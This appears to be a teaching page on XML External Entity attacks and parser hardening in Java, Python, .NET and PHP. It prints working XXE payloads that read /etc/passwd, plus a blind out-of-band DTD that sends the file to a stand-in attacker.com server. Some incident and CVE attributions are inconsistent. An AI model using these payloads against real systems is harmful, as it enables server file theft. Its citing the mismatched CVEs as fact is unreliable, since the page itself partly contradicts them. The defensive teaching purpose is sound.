07.04 · OWASP A05:2017 / A04:2021 (Insecure Design)

XML External Entities

XML has a feature, declared in the spec in 1998 and still on by default in many parsers, where a document can reference an external file and embed its contents. The feature was meant for document modularity. Attackers use it to read /etc/passwd.

What XML actually does

An XML document can declare its own internal abbreviations — entities. The famous ones are <, &, >. You can declare your own too:

<!DOCTYPE doc [ <!ENTITY company "Heliotrope Defense Systems"> ]> <doc>&company; was founded in 1947.</doc> parses as: "Heliotrope Defense Systems was founded in 1947."

Useful. What makes it dangerous is the external variant — entities that reference a URL or file path. The parser fetches the target and substitutes the result inline.

<!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <doc>&xxe;</doc> a vulnerable parser inlines /etc/passwd into the document

The application then echoes the parsed document back somewhere — into an error message, a converted PDF, a generated thumbnail, a debug log. The attacker has read a server file through a feature that was never supposed to be a vulnerability.

Three variants

07.04.A

In-band (classic)

The parsed document is echoed back in the response. Attacker reads /etc/passwd and sees it returned in the API response or rendered PDF. Easiest to exploit; loudest in logs.

07.04.B

Blind (out-of-band)

No echo, but the parser still resolves external entities. Attacker hosts a malicious DTD that exfiltrates the file contents via an HTTP request to an attacker-controlled server. Slower, but still total compromise.

07.04.C

SSRF / DoS variant

External entity points at internal-only URLs (cloud metadata, internal admin panels, intranet). Or uses the billion-laughs entity expansion attack to consume memory until the parser dies.

Anatomy of an attack

The app accepts an XML upload — an invoice, a SAML assertion, an Office document, an SVG. The user controls the XML payload. The parser is configured with defaults from 2005.

1. Attacker's payloadvulnerable
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE invoice [ <!ENTITY leak SYSTEM "file:///etc/passwd"> ]> <invoice> <customer>&leak;</customer> <amount>0</amount> </invoice>
2. Server-side parse (Java, defaults)vulnerable
// vulnerable: default DocumentBuilderFactory honors external entities DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); DocumentBuilder builder = factory.newDocumentBuilder(); Document doc = builder.parse(uploadedXml); String customer = doc.getElementsByTagName("customer").item(0).getTextContent(); log.info("Invoice from {}", customer); // logs /etc/passwd contents
3. The log file (or response, or rendered PDF)leaked
Invoice from root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ...

The blind variant — out-of-band exfiltration

The application doesn't echo the parsed value. Doesn't matter. Attacker hosts http://attacker.com/evil.dtd with a parameter entity that does the work:

payload sent to the vulnerable endpoint <!DOCTYPE r [ <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext; ]> <r>&send;</r> contents of evil.dtd hosted by attacker <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % wrap "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>"> %wrap;

The parser fetches evil.dtd, which makes it read /etc/passwd and embed it in a new entity that points at the attacker's logger. The contents arrive in the attacker's web logs as a query parameter. No response from the vulnerable app needed.

Defenses

Disable external entities — the only real fix

Every major XML parser has a flag for this. Set it.

Java · DocumentBuilderFactorysafe
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); factory.setXIncludeAware(false); factory.setExpandEntityReferences(false);
Python · defusedxmlsafe
# pip install defusedxml — this is the answer for Python. # Drop-in replacement for ElementTree, with all the dangerous bits turned off. from defusedxml.ElementTree import parse tree = parse(uploaded_xml) # raises DefusedXmlException on any external entity or DTD.
.NET · XmlReader settingssafe
var settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit; // the important one settings.XmlResolver = null; using (var reader = XmlReader.Create(uploadedXml, settings)) { ... }
PHP · libxmlsafe
// disable external entity loading process-wide libxml_disable_entity_loader(true); // deprecated in PHP 8.0 — entities are now off by default // for PHP 8+: pass LIBXML_NOENT off (the default); avoid LIBXML_DTDLOAD.

Other layers

  • Prefer JSON. Most modern APIs don't need XML at all. If you can refuse XML uploads, refuse them.
  • WAF rules can catch <!ENTITY and SYSTEM in request bodies, but parser config is the real fix — the WAF is a tripwire, not a wall.
  • Watch for SAML and Office docs. Both are XML under the hood. SAML responses, in particular, were a major XXE vector for years — CVE-2017-9248 (Telerik), CVE-2017-5638 (Apache Struts S2-045) and many others.
  • Sandbox the parsing process. No outbound network. Read-only access to a minimal filesystem. If the parser is compromised, the blast radius is small.

The takeaway

XXE is the cleanest example of a feature that became a vulnerability. Nobody using an XML invoice API in 2025 wants their parser to fetch external URLs. But the XML 1.0 spec from 1998 enabled it, parsers shipped with it on, and twenty years later the bug is still found in fresh code. Disable external entities in every XML parser you initialize. Prefer JSON for new APIs. Treat XML upload endpoints as high-value defensive targets.

OWASP standing

XXE had its own slot in the OWASP Top 10 (2017): A4 — XML External Entities. In the 2021 refresh, OWASP folded XXE into the broader A05:2021 Security Misconfiguration and A04:2021 Insecure Design categories. The bug class hasn't gone away — it's just classified differently.

Notable real incidents: Facebook (2014 — $33,500 bounty); Apple iCloud authentication endpoint (2017, via SAML); Apache Struts (2017, CVE-2017-5638 — used in the Equifax breach, though the Struts bug was OGNL rather than pure XXE); SolarWinds Orion (2019, CVE-2019-3914). XXE has been the entry point for some of the largest breaches in recent memory.

What to remember

  • XML parsers have a "fetch arbitrary URLs" feature on by default. Most code doesn't need it. Turn it off.
  • The attack surface is wherever XML is parsed: SOAP endpoints, SAML assertions, SVG uploads, DOCX/XLSX/PPTX (zip + XML), config files, RSS feeds, OPML imports, XML-RPC.
  • The damage is read-file, SSRF, DoS, and occasionally RCE via interaction with other parsers (the PHP expect:// wrapper, for example).
  • defusedxml in Python, settings flags in Java/.NET/PHP, libxml prohibitions everywhere else. The fix is a few lines.
  • Modernize. If the API can speak JSON, retire the XML endpoint. Bug class extinguished.

References

Formatted in APA 7.

  1. OWASP. (2017). A4:2017 — XML External Entities (XXE). OWASP Top 10. https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)
  2. OWASP. (2024). XML External Entity (XXE) prevention cheat sheet. OWASP Cheat Sheet Series. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
  3. Python Software Foundation. (2024). XML vulnerabilities — defusedxml documentation. https://docs.python.org/3/library/xml.html#xml-vulnerabilities
  4. MITRE. (2024). CWE-611: Improper restriction of XML external entity reference. Common Weakness Enumeration. https://cwe.mitre.org/data/definitions/611.html